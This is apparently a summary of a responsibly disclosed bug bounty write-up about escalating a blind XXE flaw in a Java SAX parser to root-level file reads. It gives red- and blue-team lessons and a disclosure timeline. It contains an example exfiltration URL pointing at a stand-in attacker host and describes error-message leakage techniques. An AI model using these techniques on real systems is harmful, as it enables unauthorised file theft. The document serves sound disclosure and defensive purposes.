From blind XXE to root-level file read access

June 23, 2024, 11:27 p.m. - by quas

Lessons learned

Red team
If something seems odd, keep digging;
Interesting handling of URL schemes by Java SAX Parser allows for some novel ways to extract information. Whereas modern Java versions do not allow multi-line files to be exfiltrated as the path of an external HTTP request (i.e. http://attacker.org/?&file;), it is possible to get multi-line response in error messages, and even in the protocol of a URL.
Blue team
Make sure internal servers are patched as diligently as public-facing ones;
Don’t treat an internal network as one trusted secure zone, but employ adequate network segmentation;
Write detailed error messages to error logs, not HTTP responses;
Relying on authentication will not necessarily mitigate against lower-level issues like XXE.

Timeline

26/Nov/18 – First noticed the interesting XML endpoint;
28/Nov/18 – Reported as blind XXE: possible to enumerate files, directories, internal network locations and open ports;
03/Dec/18 – Found vulnerable internal Confluence server, reported POC illustrating ability to elevate to read-as-root access;
04/Dec/18 – Fixed and bounty awarded;
06/Dec/18 – Requested permission to publish write-up;
12/Dec/18 – Permission granted.